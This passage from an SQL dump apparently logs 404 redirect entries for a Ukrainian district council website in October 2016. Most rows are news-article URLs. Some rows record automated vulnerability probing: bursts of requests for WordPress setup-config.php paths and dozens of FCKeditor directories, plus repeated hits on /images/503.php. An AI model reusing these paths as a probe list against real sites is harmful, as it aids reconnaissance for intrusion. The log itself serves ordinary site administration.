1fCuFdSIDGrinaaA92QdTdjnT0nzB5JDt5Z3K3CNxNb5UbcgOpAGYg7pDFy42ogRTHO9MJV7Qaxr7aRZ9uCd0IAwrUCfr3dPhVCvSl_DQRhnspbO5R9QynoGBMvyShMZUS8B1Cr6YZkApLTpQqVjaJnq4JMtmX6ytgJsfONFHp_SU_Xrht0xnoBYeg4-9fovhhPo4jHP696_jczaxZEu8OiMgvgTsoesLJAXfafzDcZJVpDQ-dDUO1pVkLixV6qjRBjGw9LoY5hcudLNt-EsEQcSpzLkWP6sTDSK0FcxYKSQ-TjLgHcjzgGi6BYyyhs-Um-8RCQQFesGs&l10n=ru&cts=1476695819649&mc=4.8013439962493525','',42,0,'2016-10-17 09:17:00','0000-00-00 00:00:00',301),(28705,'http://malyn-rayrada.gov.ua/index.php/1101-informue-nachalnik-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-malegus-a-s-shchodo-viplat-pensij-za-traven',NULL,'','',27,0,'2016-10-17 10:51:19','0000-00-00 00:00:00',301),(28706,'http://malyn-rayrada.gov.ua/index.php/576-vipadkove-foto-22-07-2013-roku-21-00-god',NULL,'','',32,0,'2016-10-17 11:12:18','0000-00-00 00:00:00',301),(28707,'http://malyn-rayrada.gov.ua/index.php/435-nareshti-vigljanulo-sonce',NULL,'','',31,0,'2016-10-17 11:47:44','0000-00-00 00:00:00',301),(28708,'http://www.malyn-rayrada.gov.ua/index.php/1135-derzhavna-veterinarna-sluzhba-rajonu-informue',NULL,'','',36,0,'2016-10-17 12:27:38','0000-00-00 00:00:00',301),(28709,'http://www.malyn-rayrada.gov.ua/index.php/1222-granichnij-strok-podannya-podatkovoji-deklaratsiji-z-plati-za-zemlyu-na-2015-rik',NULL,'','',26,0,'2016-10-17 12:33:47','0000-00-00 00:00:00',301),(28710,'http://malyn-rayrada.gov.ua/index.php/1265-pro-provedenu-robotu-po-aktsiji-miloserdya-u-2015rotsi',NULL,'','',22,0,'2016-10-17 13:45:31','0000-00-00 00:00:00',301),(28711,'http://malyn-rayrada.gov.ua/index.php/1441-pro-sklikannya-7-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',39,0,'2016-10-17 15:12:42','0000-00-00 00:00:00',301),(28712,'http://malyn-rayrada.gov.ua/index.php/904-zvernennya?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-17 15:28:56','0000-00-00 00:00:00',301),(28713,'http://malyn-rayrada.gov.ua/index.php/894-pro-posilennya-vidpovidalnosti-za-porushennya-viborchikh-prav-gromadyan?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-17 18:38:12','0000-00-00 00:00:00',301),(28714,'http://www.malyn-rayrada.gov.ua/index.php/1065-vidpovid-departamentu-minsotspolitiki-z-pitan-chornobilskikh-pilg',NULL,'','',27,0,'2016-10-17 20:16:40','0000-00-00 00:00:00',301),(28715,'http://malyn-rayrada.gov.ua/index.php/1123-20-chervnya-na-malinshchini-pokhovali-geroya-ato-vasilya-baranivskogo',NULL,'','',59,0,'2016-10-17 21:40:51','0000-00-00 00:00:00',301),(28716,'http://www.malyn-rayrada.gov.ua/index.php/979-nastav-rizdvyanij-svyatvechir',NULL,'','',25,0,'2016-10-17 22:37:56','0000-00-00 00:00:00',301),(28717,'http://www.malyn-rayrada.gov.ua/index.php/1076-vr-vvela-na-10-rokiv-moratorij-na-eksport-neobroblenikh-liso-ta-pilomaterialiv',NULL,'','',24,0,'2016-10-18 00:32:18','0000-00-00 00:00:00',301),(28718,'http://www.malyn-rayrada.gov.ua/index.php/942-uryad-zatverdzheno',NULL,'','',25,0,'2016-10-18 03:13:29','0000-00-00 00:00:00',301),(28719,'http://www.malyn-rayrada.gov.ua/index.php/943-bez-sliv',NULL,'','',22,0,'2016-10-18 03:17:37','0000-00-00 00:00:00',301),(28720,'http://www.malyn-rayrada.gov.ua/index.php/1411-povidomlennya-pro-ogoloshennya-konkursu',NULL,'https://www.google.com.ua/','',39,0,'2016-10-18 07:29:48','0000-00-00 00:00:00',301),(28721,'http://www.malyn-rayrada.gov.ua/index.php/1246-granitnenska-selishchna-rada-informue',NULL,'','',27,0,'2016-10-18 12:52:05','0000-00-00 00:00:00',301),(28722,'http://malyn-rayrada.gov.ua/index.php/1031-pro-vstanovlennya-rozdribnikh-tsin-na-prirodnij-gaz-shcho-vikoristovuetsya-dlya-potreb-naselennya',NULL,'','',62,0,'2016-10-18 13:07:39','0000-00-00 00:00:00',301),(28723,'http://www.malyn-rayrada.gov.ua/index.php/1018-shanovna-gromada-malinshchini',NULL,'','',20,0,'2016-10-18 14:08:44','0000-00-00 00:00:00',301),(28724,'http://www.malyn-rayrada.gov.ua/index.php/1177-vitaemo-iz-svyatom-pershogo-dzvonika?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-18 16:40:25','0000-00-00 00:00:00',301),(28725,'http://www.malyn-rayrada.gov.ua/index.php/1123-20-chervnya-na-malinshchini-pokhovali-geroya-ato-vasilya-baranivskogo',NULL,'','',24,0,'2016-10-18 20:34:48','0000-00-00 00:00:00',301),(28726,'http://www.malyn-rayrada.gov.ua/index.php/904-zvernennya',NULL,'','',30,0,'2016-10-18 22:20:32','0000-00-00 00:00:00',301),(28727,'http://www.malyn-rayrada.gov.ua/xmlrpc.php?rsd',NULL,'','',7,0,'2016-10-19 01:56:59','0000-00-00 00:00:00',301),(28728,'http://www.malyn-rayrada.gov.ua/wordpress/',NULL,'','',13,0,'2016-10-19 01:57:00','0000-00-00 00:00:00',301),(28729,'http://www.malyn-rayrada.gov.ua/wp/',NULL,'','',14,0,'2016-10-19 01:57:00','0000-00-00 00:00:00',301),(28730,'http://malyn-rayrada.gov.ua/index.php/1222-granichnij-strok-podannya-podatkovoji-deklaratsiji-z-plati-za-zemlyu-na-2015-rik',NULL,'','',23,0,'2016-10-19 05:43:41','0000-00-00 00:00:00',301),(28731,'http://www.malyn-rayrada.gov.ua/index.php/1441-pro-sklikannya-7-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-19 05:52:37','0000-00-00 00:00:00',301),(28732,'http://malyn-rayrada.gov.ua/index.php/1281-pidvishchennya-pensij-invalidam-iii-grupi-vnaslidok-zagalnogo-zakhvoryuvannya-invalidam-z-ditinstva-ta-dityam-invalidam',NULL,'','',27,0,'2016-10-19 06:21:21','0000-00-00 00:00:00',301),(28733,'http://malyn-rayrada.gov.ua/index.php/989-indeksatsiya-normativnoji-groshovoji-otsinki-zemel',NULL,'','',21,0,'2016-10-19 07:04:31','0000-00-00 00:00:00',301),(28734,'http://malyn-rayrada.gov.ua/index.php/1005-do-vidoma-zhiteliv',NULL,'','',75,0,'2016-10-19 12:06:19','0000-00-00 00:00:00',301),(28735,'http://www.malyn-rayrada.gov.ua/index.php/1148-vr-ukrajini-prijnyala-zakon-pro-mistsevi-vibori',NULL,'','',24,0,'2016-10-19 17:35:46','0000-00-00 00:00:00',301),(28736,'http://www.malyn-rayrada.gov.ua/wp/wp-admin/setup-config.php',NULL,'','',3,0,'2016-10-19 17:45:51','0000-00-00 00:00:00',301),(28737,'http://www.malyn-rayrada.gov.ua/blog/wordpress/wp-admin/setup-config.php',NULL,'','',2,0,'2016-10-19 17:45:51','0000-00-00 00:00:00',301),(28738,'http://www.malyn-rayrada.gov.ua/wordpress/wp-admin/setup-config.php',NULL,'','',3,0,'2016-10-19 17:45:51','0000-00-00 00:00:00',301),(28739,'http://www.malyn-rayrada.gov.ua/wordpress/wordpress/wp-admin/setup-config.php',NULL,'','',1,0,'2016-10-19 17:45:51','0000-00-00 00:00:00',301),(28740,'http://www.malyn-rayrada.gov.ua/backup/wp-admin/setup-config.php',NULL,'','',1,0,'2016-10-19 17:45:51','0000-00-00 00:00:00',301),(28741,'http://www.malyn-rayrada.gov.ua/news//wp-admin/setup-config.php',NULL,'','',1,0,'2016-10-19 17:45:51','0000-00-00 00:00:00',301),(28742,'http://malyn-rayrada.gov.ua/index.php/1439-v-ukrajini-sogodni-vidznachaetsya-den-peremogi-nad-natsizmom-u-drugij-svitovij-vijni-1939-1945-rokiv',NULL,'','',39,0,'2016-10-19 17:52:06','0000-00-00 00:00:00',301),(28743,'http://www.malyn-rayrada.gov.ua/index.php/1077-detsentralizatsiya-2015',NULL,'','',29,0,'2016-10-19 19:08:25','0000-00-00 00:00:00',301),(28744,'http://www.malyn-rayrada.gov.ua/index.php/781-vipadkove-foto',NULL,'','',29,0,'2016-10-19 19:32:37','0000-00-00 00:00:00',301),(28745,'http://www.malyn-rayrada.gov.ua/index.php/1439-v-ukrajini-sogodni-vidznachaetsya-den-peremogi-nad-natsizmom-u-drugij-svitovij-vijni-1939-1945-rokiv',NULL,'','',26,0,'2016-10-19 20:15:12','0000-00-00 00:00:00',301),(28746,'http://www.malyn-rayrada.gov.ua/index.php/1355-v-ukrajini-sogodni-den-vshanuvannya-uchasnikiv-bojovikh-dij-na-teritoriji-inshikh-derzhav-nasampered-tsej-den-stosuetsya-vijskovikh-yaki-voyuvali-v-afganistani',NULL,'','',33,0,'2016-10-19 21:21:23','0000-00-00 00:00:00',301),(28747,'http://malyn-rayrada.gov.ua/index.php/1334-pro-sklikannya-4-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',31,0,'2016-10-19 21:48:15','0000-00-00 00:00:00',301),(28748,'http://www.malyn-rayrada.gov.ua/index.php/1104-atestatsiya-kolektivi-narodnoji-samodiyalnosti-malinshchini?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-19 22:16:05','0000-00-00 00:00:00',301),(28749,'http://www.malyn-rayrada.gov.ua/index.php/891-zakon-ukrajini-pro-ochishchennya-vladi',NULL,'','',25,0,'2016-10-19 23:33:58','0000-00-00 00:00:00',301),(28750,'http://www.malyn-rayrada.gov.ua/index.php/1558-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-10-sesiyu-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-19 23:37:25','0000-00-00 00:00:00',301),(28751,'http://malyn-rayrada.gov.ua/index.php/151-svjatkuvali-bibliotekari-rajonu',NULL,'','',32,0,'2016-10-20 03:06:47','0000-00-00 00:00:00',301),(28752,'http://malyn-rayrada.gov.ua/index.php/1411-povidomlennya-pro-ogoloshennya-konkursu',NULL,'','',30,0,'2016-10-20 03:50:19','0000-00-00 00:00:00',301),(28753,'http://malyn-rayrada.gov.ua/index.php/1009-do-vidoma-deputativ-malinskoji-rajonnoji-radi',NULL,'','',22,0,'2016-10-20 04:04:41','0000-00-00 00:00:00',301),(28754,'http://malyn-rayrada.gov.ua/index.php/1252-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-pidvishchennya-pensij-z-01-veresnya-2015-roku-vidbulos-ne-dlya-vsikh-kategorij',NULL,'','',26,0,'2016-10-20 07:50:54','0000-00-00 00:00:00',301),(28755,'http://malyn-rayrada.gov.ua/index.php/1246-granitnenska-selishchna-rada-informue',NULL,'','',45,0,'2016-10-20 08:12:44','0000-00-00 00:00:00',301),(28756,'http://www.malyn-rayrada.gov.ua/index.php/1038-lyudi-skhamenitsya',NULL,'','',21,0,'2016-10-20 09:17:06','0000-00-00 00:00:00',301),(28757,'http://malyn-rayrada.gov.ua/index.php/1558-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-10-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',34,0,'2016-10-20 11:44:08','0000-00-00 00:00:00',301),(28758,'http://malyn-rayrada.gov.ua/index.php/1437-pro-priznachennya-yu-rudchenka-golovoyu-malinskoji-rajonnoji-derzhavnoji-administratsiji-zhitomirskoji-oblasti',NULL,'','',39,0,'2016-10-20 11:55:25','0000-00-00 00:00:00',301),(28759,'http://malyn-rayrada.gov.ua/index.php/943-bez-sliv',NULL,'','',24,0,'2016-10-20 11:59:02','0000-00-00 00:00:00',301),(28760,'http://www.malyn-rayrada.gov.ua/index.php/1104-atestatsiya-kolektivi-narodnoji-samodiyalnosti-malinshchini',NULL,'','',30,0,'2016-10-20 12:28:38','0000-00-00 00:00:00',301),(28761,'http://malyn-rayrada.gov.ua/index.php/1077-detsentralizatsiya-2015',NULL,'','',27,0,'2016-10-20 13:02:38','0000-00-00 00:00:00',301),(28762,'http://malyn-rayrada.gov.ua/index.php/837-mi-budemo-nastupati-i-zvilnjati-nashu-zemlju',NULL,'','',36,0,'2016-10-20 16:00:36','0000-00-00 00:00:00',301),(28763,'http://malyn-rayrada.gov.ua/index.php/1038-lyudi-skhamenitsya',NULL,'','',28,0,'2016-10-20 16:10:21','0000-00-00 00:00:00',301),(28764,'http://www.malyn-rayrada.gov.ua/index.php/1558-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-10-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',32,0,'2016-10-20 18:21:17','0000-00-00 00:00:00',301),(28765,'http://www.malyn-rayrada.gov.ua/index.php/894-pro-posilennya-vidpovidalnosti-za-porushennya-viborchikh-prav-gromadyan',NULL,'','',23,0,'2016-10-20 19:09:41','0000-00-00 00:00:00',301),(28766,'http://malyn-rayrada.gov.ua/index.php/1375-pro-sklikannya-5-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',26,0,'2016-10-20 20:06:44','0000-00-00 00:00:00',301),(28767,'http://malyn-rayrada.gov.ua/index.php/1027-kogo-torknutsya-zmini-do-pensijnogo-zakonodavstva',NULL,'','',27,0,'2016-10-20 20:47:08','0000-00-00 00:00:00',301),(28768,'http://www.malyn-rayrada.gov.ua/index.php/1260-vitaemo-iz-svyatom?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-20 21:15:56','0000-00-00 00:00:00',301),(28769,'http://www.malyn-rayrada.gov.ua/index.php/1441-pro-sklikannya-7-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',25,0,'2016-10-20 23:05:05','0000-00-00 00:00:00',301),(28770,'http://www.malyn-rayrada.gov.ua/index.php/1404-novini-iz-rajonnoji-spartakiadi',NULL,'','',26,0,'2016-10-20 23:16:05','0000-00-00 00:00:00',301),(28771,'http://malyn-rayrada.gov.ua/index.php/1409-ogoloshennya-2',NULL,'','',38,0,'2016-10-21 01:45:47','0000-00-00 00:00:00',301),(28772,'http://www.malyn-rayrada.gov.ua/index.php/1434-visti-iz-chempionatu-ukrajini-z-boksu-sered-yunakiv',NULL,'','',29,0,'2016-10-21 02:05:46','0000-00-00 00:00:00',301),(28773,'http://malyn-rayrada.gov.ua/index.php/988-minsotspolitiki-mistsevi-organi-vladi-sami-virishuvatimut-yak-krashche-organizuvati-kharchuvannya-ditej-chornobiltsiv',NULL,'','',24,0,'2016-10-21 02:16:36','0000-00-00 00:00:00',301),(28774,'http://malyn-rayrada.gov.ua//images/503.php',NULL,'http://www.googlebot.com/bot.html','',11,0,'2016-10-21 08:43:41','0000-00-00 00:00:00',301),(28775,'http://malyn-rayrada.gov.ua/index.php/1280-realizatsiya-ta-zakhist-prav-lyudini',NULL,'','',27,0,'2016-10-21 08:56:09','0000-00-00 00:00:00',301),(28776,'http://malyn-rayrada.gov.ua/index.php/1135-derzhavna-veterinarna-sluzhba-rajonu-informue',NULL,'','',21,0,'2016-10-21 09:40:41','0000-00-00 00:00:00',301),(28777,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1549-pro-nadannya-dozvolu-teritorialnomu-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-na-vlashtuvannya-shpakovich-o-m?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-21 09:49:20','0000-00-00 00:00:00',301),(28778,'http://www.malyn-rayrada.gov.ua/index.php/1280-realizatsiya-ta-zakhist-prav-lyudini',NULL,'','',36,0,'2016-10-21 11:20:34','0000-00-00 00:00:00',301),(28779,'http://malyn-rayrada.gov.ua/index.php/761-pid-chas-vikonannja-robit-po-blagoustroju-centru?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-21 15:37:48','0000-00-00 00:00:00',301),(28780,'http://malyn-rayrada.gov.ua/index.php/1459-pro-sklikannya-8-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',42,0,'2016-10-21 19:24:59','0000-00-00 00:00:00',301),(28781,'http://www.malyn-rayrada.gov.ua/index.php/569-den-sela-u-vladivci-fotoreportazh?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-21 21:23:13','0000-00-00 00:00:00',301),(28782,'http://malyn-rayrada.gov.ua/index.php/1080-oshchadbank-bere-aktivnu-uchast-u-roz-yasnyuvalnij-roboti-shchodo-kreditnoji-pidtrimki-energoefektivnikh-zakhodiv-u-krajini',NULL,'','',22,0,'2016-10-21 22:14:44','0000-00-00 00:00:00',301),(28783,'http://www.malyn-rayrada.gov.ua/index.php/576-vipadkove-foto-22-07-2013-roku-21-00-god',NULL,'','',25,0,'2016-10-21 22:17:11','0000-00-00 00:00:00',301),(28784,'http://malyn-rayrada.gov.ua/index.php/414-fotoreportazh-iz-svjatkuvannja-dnja-miscevogo',NULL,'','',31,0,'2016-10-22 01:14:58','0000-00-00 00:00:00',301),(28785,'http://malyn-rayrada.gov.ua/editor1/editor/',NULL,'','',1,0,'2016-10-22 01:39:48','0000-00-00 00:00:00',301),(28786,'http://malyn-rayrada.gov.ua/support/editor/editor/',NULL,'','',1,0,'2016-10-22 01:39:48','0000-00-00 00:00:00',301),(28787,'http://malyn-rayrada.gov.ua/javascript/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:48','0000-00-00 00:00:00',301),(28788,'http://malyn-rayrada.gov.ua/admin/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:48','0000-00-00 00:00:00',301),(28789,'http://malyn-rayrada.gov.ua/outils/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28790,'http://malyn-rayrada.gov.ua/Fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28791,'http://malyn-rayrada.gov.ua/library/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28792,'http://malyn-rayrada.gov.ua/system/editor/editor/',NULL,'','',2,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28793,'http://malyn-rayrada.gov.ua/inc/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28794,'http://malyn-rayrada.gov.ua/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28795,'http://malyn-rayrada.gov.ua/scripts/FCKeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28796,'http://malyn-rayrada.gov.ua/system/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28797,'http://malyn-rayrada.gov.ua/Fckeditorold/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28798,'http://malyn-rayrada.gov.ua/editorold/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28799,'http://malyn-rayrada.gov.ua/plugins/editor/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28800,'http://malyn-rayrada.gov.ua/inc/editors/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28801,'http://malyn-rayrada.gov.ua/inc/editors/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28802,'http://malyn-rayrada.gov.ua/scripts/fckeditor/editor/',NULL,'','',2,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28803,'http://malyn-rayrada.gov.ua/templates/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:49','0000-00-00 00:00:00',301),(28804,'http://malyn-rayrada.gov.ua/FCKeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28805,'http://malyn-rayrada.gov.ua/fck/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28806,'http://malyn-rayrada.gov.ua/plugins/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28807,'http://malyn-rayrada.gov.ua/javascript/editors/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28808,'http://malyn-rayrada.gov.ua/outils/editor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28809,'http://malyn-rayrada.gov.ua/editor/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28810,'http://malyn-rayrada.gov.ua/editor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28811,'http://malyn-rayrada.gov.ua/lib/editor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28812,'http://malyn-rayrada.gov.ua/include/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28813,'http://malyn-rayrada.gov.ua/data/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28814,'http://malyn-rayrada.gov.ua/ckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28815,'http://malyn-rayrada.gov.ua/administartor/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28816,'http://malyn-rayrada.gov.ua/administartors/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28817,'http://malyn-rayrada.gov.ua/admin/editor/editor/',NULL,'','',1,0,'2016-10-22 01:39:51','0000-00-00 00:00:00',301),(28818,'http://malyn-rayrada.gov.ua/common/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:54','0000-00-00 00:00:00',301),(28819,'http://malyn-rayrada.gov.ua/Fckeditornew/editor/',NULL,'','',1,0,'2016-10-22 01:39:54','0000-00-00 00:00:00',301),(28820,'http://malyn-rayrada.gov.ua/javascript/editors/editor/',NULL,'','',1,0,'2016-10-22 01:39:57','0000-00-00 00:00:00',301),(28821,'http://malyn-rayrada.gov.ua/js/editor/fckeditor/editor/',NULL,'','',1,0,'2016-10-22 01:39:57','0000-00-00 00:00:00',301),(28822,'http://malyn-rayrada.gov.ua/scripts/editor/editor/',NULL,'','',3,0,'2016-10-22 01:39:57','0000-00-00 00:00:00',301),(28823,'http://www.malyn-rayrada.gov.ua/index.php/1117-za-vikoristannya-zemel-byudzhet-povinen-otrimuvati-dodatkovi-koshti?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-22 10:25:49','0000-00-00 00:00:00',301),(28824,'http://www.malyn-rayrada.gov.ua/index.php/1116-do-uvagi-malinchan',NULL,'','',30,0,'2016-10-22 11:07:50','0000-00-00 00:00:00',301),(28825,'http://www.malyn-rayrada.gov.ua/index.php/837-mi-budemo-nastupati-i-zvilnjati-nashu-zemlju',NULL,'','',24,0,'2016-10-23 00:16:37','0000-00-00 00:00:00',301),(28826,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1549-pro-nadannya-dozvolu-teritorialnomu-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-na-vlashtuvannya-shpakovich-o-m',NULL,'','',24,0,'2016-10-23 00:43:52','0000-00-00 00:00:00',301),(28827,'http://www.malyn-rayrada.gov.ua/index.php/1375-pro-sklikannya-5-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',30,0,'2016-10-23 07:52:10','0000-00-00 00:00:00',301),(28828,'http://www.malyn-rayrada.gov.ua/index.php/1031-pro-vstanovlennya-rozdribnikh-tsin-na-prirodnij-gaz-shcho-vikoristovuetsya-dlya-potreb-naselennya',NULL,'','',23,0,'2016-10-23 12:31:27','0000-00-00 00:00:00',301),(28829,'http://malyn-rayrada.gov.ua/index.php/904-zvernennya',NULL,'','',20,0,'2016-10-23 15:03:33','0000-00-00 00:00:00',301),(28830,'http://malyn-rayrada.gov.ua/index.php/1040-do-uvagi-zhiteliv-malinskogo-rajonu',NULL,'','',29,0,'2016-10-23 23:21:30','0000-00-00 00:00:00',301),(28831,'http://www.malyn-rayrada.gov.ua//images/503.php',NULL,'http://www.googlebot.com/bot.html','',10,0,'2016-10-24 03:26:20','0000-00-00 00:00:00',301),(28832,'http://malyn-rayrada.gov.ua/index.php/1025-rozenko-reformuvannya-sistemi-nadannya-subsidij-odna-z-klyuchovikh-reform-u-sotsialnij-sferi',NULL,'','',24,0,'2016-10-24 15:07:32','0000-00-00 00:00:00',301),(28833,'http://malyn-rayrada.gov.ua/index.php/1341-oberezhno-grip',NULL,'','',29,0,'2016-10-24 17:19:40','0000-00-00 00:00:00',301),(28834,'http://www.malyn-rayrada.gov.ua/index.php/1281-pidvishchennya-pensij-invalidam-iii-grupi-vnaslidok-zagalnogo-zakhvoryuvannya-invalidam-z-ditinstva-ta-dityam-invalidam',NULL,'','',31,0,'2016-10-24 17:34:47','0000-00-00 00:00:00',301),(28835,'http://malyn-rayrada.gov.ua/index.php/761-pid-chas-vikonannja-robit-po-blagoustroju-centru',NULL,'','',31,0,'2016-10-24 18:46:58','0000-00-00 00:00:00',301),(28836,'http://www.malyn-rayrada.gov.ua/index.php/1117-za-vikoristannya-zemel-byudzhet-povinen-otrimuvati-dodatkovi-koshti',NULL,'','',28,0,'2016-10-24 19:52:26','0000-00-00 00:00:00',301),(28837,'http://malyn-rayrada.gov.ua/index.php/974-shchodo-pensijnogo-zabezpechennya-osib-yaki-pereselilisya-z-avtonomnoji-respubliki-krim-ta-m-sevastopolya',NULL,'','',29,0,'2016-10-24 20:48:14','0000-00-00 00:00:00',301),(28838,'http://malyn-rayrada.gov.ua/index.php/781-vipadkove-foto',NULL,'','',27,0,'2016-10-24 20:59:09','0000-00-00 00:00:00',301),(28839,'http://malyn-rayrada.gov.ua/index.php/1355-v-ukrajini-sogodni-den-vshanuvannya-uchasnikiv-bojovikh-dij-na-teritoriji-inshikh-derzhav-nasampered-tsej-den-stosuetsya-vijskovikh-yaki-voyuvali-v-afganistani',NULL,'','',35,0,'2016-10-24 23:24:19','0000-00-00 00:00:00',301),(28840,'http://malyn-rayrada.gov.ua/index.php/994-do-uvagi-platnikiv-fiksovanogo-silskogospodarskogo-podatku',NULL,'','',23,0,'2016-10-25 01:33:51','0000-00-00 00:00:00',301),(28841,'http://malyn-rayrada.gov.ua/index.php/1180-do-uvagi-zhiteliv-malinshchini',NULL,'','',20,0,'2016-10-25 04:10:10','0000-00-00 00:00:00',301),(28842,'http://malyn-rayrada.gov.ua/index.php/801-nacionalnij-ekzit-pol-drugogo-turu-ne-bude',NULL,'','',29,0,'2016-10-25 04:16:40','0000-00-00 00:00:00',301),(28843,'http://malyn-rayrada.gov.ua/index.php/1403-sportivni-novini',NULL,'','',36,0,'2016-10-25 04:34:16','0000-00-00 00:00:00',301),(28844,'http://malyn-rayrada.gov.ua/index.php/849-nareshti',NULL,'','',28,0,'2016-10-25 08:01:23','0000-00-00 00:00:00',301),(28845,'http://malyn-rayrada.gov.ua/index.php/35-zhiteli-slobidskoi-gromadi-vidznachili-den-ljudej',NULL,'','',20,0,'2016-10-25 08:18:01','0000-00-00 00:00:00',301),(28846,'http://malyn-rayrada.gov.ua/index.php/1134-onovleno-elektroosvitlennya-stseni-malinskogo-rbk',NULL,'','',19,0,'2016-10-25 08:37:29','0000-00-00 00:00:00',301),(28847,'http://www.malyn-rayrada.gov.ua/index.php/1005-do-vidoma-zhiteliv',NULL,'','',24,0,'2016-10-25 09:33:27','0000-00-00 00:00:00',301),(28848,'http://www.malyn-rayrada.gov.ua/index.php/1080-oshchadbank-bere-aktivnu-uchast-u-roz-yasnyuvalnij-roboti-shchodo-kreditnoji-pidtrimki-energoefektivnikh-zakhodiv-u-krajini',NULL,'','',24,0,'2016-10-25 21:48:17','0000-00-00 00:00:00',301),(28849,'http://malyn-rayrada.gov.ua/index.php/1104-atestatsiya-kolektivi-narodnoji-samodiyalnosti-malinshchini',NULL,'','',24,0,'2016-10-25 22:40:13','0000-00-00 00:00:00',301),(28850,'http://www.malyn-rayrada.gov.ua/index.php/1091-informatsiya-shchodo-pensijnoji-reformi',NULL,'','',25,0,'2016-10-26 00:39:43','0000-00-00 00:00:00',301),(28851,'http://malyn-rayrada.gov.ua/index.php/899-zastupnik-keruyuchogo-malinskogo-viddilennya-oshchadbanku-svitlana-mikhajlenko-informue-pro-programu-pridbannya-kotliv',NULL,'','',21,0,'2016-10-26 04:52:23','0000-00-00 00:00:00',301),(28852,'http://www.malyn-rayrada.gov.ua/index.php/569-den-sela-u-vladivci-fotoreportazh',NULL,'','',24,0,'2016-10-26 22:20:52','0000-00-00 00:00:00',301),(28853,'http://www.malyn-rayrada.gov.ua/index.php/1040-do-uvagi-zhiteliv-malinskogo-rajonu?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-28 08:18:18','0000-00-00 